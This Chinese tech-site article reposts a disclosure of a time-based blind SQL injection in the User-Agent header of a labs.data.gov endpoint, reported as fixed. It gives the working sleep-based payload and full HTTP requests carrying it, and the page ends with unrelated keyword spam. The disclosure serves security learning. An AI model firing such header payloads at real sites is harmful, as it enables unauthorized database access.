千家信息网

如何分析 HTTP头注入中的User-Agent注入

发表于:2025-02-04 作者:千家信息网编辑
千家信息网最后更新 2025年02月04日,如何分析 HTTP头注入中的User-Agent注入,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。漏洞信息发现者:har
千家信息网最后更新 2025年02月04日如何分析 HTTP头注入中的User-Agent注入

如何分析 HTTP头注入中的User-Agent注入,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。


漏洞信息
发现者:harisec

漏洞种类:SQL注入

危害等级:严重

漏洞状态:已修复


前言
Harisec在以下网站中发现一个SQL注入漏洞,注入的位置在User-Agent。
https://labs.data.gov/dashboard/datagov/csv_to_json

漏洞再现
Harisec使用了盲注的方式来确认该漏洞

例如:将User-Agent的值设置为

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

将导致服务器在25秒后响应

这里,我们看一下具体的数据包内容

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

服务器在25秒后响应,与User-Agent的值相同

将User-Agent的值改一下,改成9秒后响应

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*


漏洞影响

该漏洞可以使攻击者注入恶意的SQL语句。

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注行业资讯频道,感谢您对的支持。

漏洞 内容 服务器 帮助 服务 分析 清楚 相同 位置 信息 前言 发现者 可以使 对此 恶意 攻击者 数据 文章 新手 方式 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 电脑主板和服务器有什么区别 服务器无效响应12002 51为向互联网科技有限公司 杭州网络技术有限公司电话 如何新建数据库的表 如何开发ios软件开发 湖北省网络安全协会会长是谁 java语言操作数据库使用的是 管家婆数据库怎么关掉 c 交换输入的两个数据库 服务器搭建好后如何上广域网 三级网络技术分析化学 通信网络安全与防护习题答案 新建数据库不设置表能用么 网络安全等级保护实施日期 软件工程软件开发报告 黑暗之魂3自建服务器 启达天洛网络技术 数据库怎么把日期变成空 计算机三级考试网络技术考啥 网易星球网络安全吗 java语言操作数据库使用的是 软件开发行业中级证书有哪些 庐江品质网络技术咨询介绍 服务器搭建好后如何上广域网 全球服务器存储市场增长 点菜宝服务器怎么安装 数据库录入功能 关系数据库中所管理的关系是指 网络安全法考试开展情况
0